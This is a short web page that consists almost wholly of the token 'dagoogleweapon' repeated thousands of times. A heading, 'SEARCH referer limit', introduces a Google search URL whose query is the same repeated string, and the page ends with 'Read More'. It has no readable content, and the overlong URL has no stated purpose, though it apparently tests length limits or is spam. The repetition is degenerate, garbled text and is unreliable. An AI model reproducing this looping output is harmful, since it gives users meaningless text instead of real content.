agoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondago

SEARCH referer limit
http://google.com/search?q=dagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogl

---

Read More